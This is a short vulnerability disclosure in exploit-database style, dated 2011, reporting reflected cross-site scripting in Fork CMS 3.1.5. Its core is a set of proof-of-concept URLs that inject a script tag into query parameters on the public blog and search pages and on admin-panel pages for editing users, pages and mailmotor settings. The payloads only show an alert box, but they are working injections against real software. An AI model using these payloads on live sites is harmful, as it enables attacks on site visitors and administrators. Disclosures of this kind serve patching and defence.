############################################################################################################### 

#  Exploit Title: Fork CMS v.3.1.5  - Reflected Cross-Site Scripting ( XSS ) Vulnerability 

#  Script Page : http://www.fork-cms.com/  
                   
#  Date: 13-12-2011

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista (IE9) 
 
 
############################################################################################################### 
 
#  Cross-Site Scripting (XSS) on Front Site

#  POC:  

#  http://site.com/blog/detail/article?utm_source=feed&utm_medium=rss"><script>alert('xss')</script>  

#  http://site.com/search?form=search&q_widget=&submit="><script>alert('xss')</script> 
 
#  http://site.com/search?form=search&q_widget="><script>alert('xss')</script>

#  http://site.com/search?form="><script>alert('xss')</script>

################################################################################################################ 

#  Cross-Site Scripting (XSS) on Admin Panel

#  POC: 


#  http://site.com/private/en/users/edit?id=1"><script>alert('xss')</script>

#  http://site.com/private/en/pages/edit?token=true&id=1"><script>alert('xss')</script>
 
#  http://site.com/private/en/mailmotor/settings?token="><script>alert('xss')</script> 
 
###############################################################################################################
 
# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.

################################################################################################################